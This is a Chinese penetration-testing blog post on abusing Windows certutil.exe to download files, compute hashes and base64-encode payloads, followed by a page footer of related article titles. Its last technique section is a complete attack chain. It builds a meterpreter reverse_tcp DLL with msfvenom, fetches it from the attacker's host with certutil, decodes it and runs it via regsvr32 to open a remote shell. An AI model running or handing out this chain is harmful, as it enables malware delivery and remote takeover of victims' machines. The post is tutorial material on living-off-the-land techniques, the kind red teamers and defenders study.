certutil简介

  • 用于证书管理
  • 支持xp-win10
  • 更多操作说明见https://technet.microsoft.com/zh-cn/library/cc755341(v=ws.10).aspx

渗透测试中的应用

  1. 保存在当前路径,文件名称同URL

    certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/version.txt

  2. 保存在当前路径,指定保存文件名称

    certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/version.txt file.txt

  3. 保存在缓存目录,名称随机

    缓存目录位置: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Contentcertutil.exe -urlcache -f https://raw.githubusercontent.com/3gstudent/test/master/version.txt

  4. 支持保存二进制文件

    certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll

    注:使用downloader默认在缓存目录位置:

    %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content保存下载的文件副本

  5. 清除下载文件副本

    直接删除缓存目录对应文件
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll delete
查看缓存项目:certutil.exe -urlcache *

简单测试

  1. 计算文件hash

    certutil.exe -hashfile msg.dll

  2. SHA256:

    certutil.exe -hashfile msg.dll SHA256

  3. MD5:

    certutil.exe -hashfile msg.dll MD5

  4. base64编码

    CertUtil -encode InFile OutFile

  5. base64解码

    CertUtil -decode InFile OutFile

    注:编码后的文件会添加两处标识信息:

    文件头:

    -----BEGIN CERTIFICATE-----

    文件尾:

    -----END CERTIFICATE-----

msfconsole上线

  1. 生成payload

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.137 lport=4444 -f dll > dll.txt
python -m SimpleHTTPServer 8080

  2. 执行下载命令

    certutil -urlcache -split -f http://192.168.159.137:8080/dll.txt dll.txt | certutil -encode dll.txt edll.txt
Certutil -decode .\edll.txt  exploit.dll
regsvr32 /s /u .\exploit.dll

  3. 添加信任上线

引用

三号学生师傅文章:https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84certutil.exe/
二向箔安全学院
https://zhuanlan.zhihu.com/p/107819644

渗透测试中的certutil相关推荐

  1. 监控渗透测试中Certutil利用行为

    简介 Certutil.exe是作为证书服务的一部分安装的命令行程序. 我们可以使用此工具在目标计算机上执行恶意EXE文件,并获取meterpreter会话. 补充说明:在高版本操作系统中,可以通过配 ...

  2. 如何在渗透测试中尽可能隐藏自己-proxychains4使用配置教程

    在渗透测试中,往往需要对自身电脑ip进行网络上的隐藏,如何才能快速简单的在网络扫描中简单实现匿名扫描呢? Proxychains帮助我们完成这一操作 那么 ,proxychains是什么? GNU协议 ...

  3. 渗透测试中信息收集的那些事

    渗透测试中信息收集的那些事 转载自:TideSec(知名安全团队)--VllTomFord(大佬)------https://www.cnblogs.com/OpenCyberSec/p/107941 ...

  4. 详述MySQL服务在渗透测试中的利用

    本文作者:i春秋签约作家--Binghe 致力于书写ichunqiu社区历史上最长篇最细致最真实的技术复现文章. 文章目录: MySQL之UDF提权 MySQL之MOF提权 MySQL之常规写启动项提 ...

  5. 渗透测试中常用端口及利用

    渗透测试中常用端口及利用 端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆 ...

  6. 【3】web安全入门篇-渗透测试中常用的命令

    1.linux命令 渗透测试中常用的linux命令 上面博客提到的基本都能满足需求 2.cmd命令 常用的cmd命令 cmd命令和linux命令常用的对于web入门的萌新可以看看上面博客,多敲一敲用的 ...

  7. 浅析DNSlog在渗透测试中的实战技巧

    文章目录 前言 SSRF 盲打 XSS的盲打 XXE的盲打 SQL的盲注 RCE的盲打 总结 前言 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起 DNS 请求,这个时候就可以通过这种方式把 ...

  8. 渗透测试中的端口利用

    渗透测试中的端口利用 我们在进行渗透测试中,一般情况下会对端口进行扫描,看看服务器中开启了哪些端口,对应的端口一般存在对应的服务,而这些服务可能存在相应的漏洞,下面就是简单结束一下端口对应服务,服务可 ...

  9. 【python渗透测试】python在渗透测试中的利用(完全版,持续中出)

    跟着gpt学习python在渗透测试中的利用

最新文章

  1. 新开窗口不被拦截的方法-window.open和表单提交form
  2. 课时 17-深入理解 etcd:etcd 性能优化实践(陈星宇)
  3. SpringBoot使用SOFA-Lookout监控
  4. jmeter固定定时器使用与思考
  5. java web分层的思想
  6. 科大星云诗社动态20210208
  7. 蓝桥杯 2011年第二届C语言初赛试题(5)
  8. FreeSql (十六)分页查询
  9. CollapsiblePanel控件
  10. java android 服务器_Android/Java从服务器端下载图片
  11. Keepalived+Nginx实现高可用,反向代理---模拟实现线上环境
  12. 【解题报告】Jury Meeting (9.8CF div2)
  13. cad2016中选择全图字体怎么操作_在学习CAD的过程中,经常会遇到的10个问题,你遇到过吗...
  14. Win7强制删除文件或文件夹
  15. xp无法访问win7计算机,xp系统访问win7共享文件夹提示无权限如何解决
  16. 诸如(1234568) 0xFF这类
  17. 人工智能项目的伦理审查
  18. Python爬虫实例(2)-用BeautifulSoup爬取一个网页上的多张照片(以百度贴吧为例)
  19. Docker容器化技术
  20. 中国铷铯及其化合物行业研究与投资前景报告(2022版)

热门文章

  1. 使用WinDbg抓取程序报错的Dump文件
  2. kingBase连接工具KStudio安装使用介绍
  3. Excel中提取英文,数值和编码(LEN函数)
  4. 北师大网络教育计算机作业四,北师大计算机离线作业之网络设置作业
  5. python yield关键字全面解析
  6. Python第三方库安装使用国内镜像下载地址
  7. YYCache源码解读 (一)
  8. FISCO BCOS
  9. 洛谷 P1325 雷达安装 贪心
  10. python列表和元组的应用,Python中列表和元组的使用方法和区别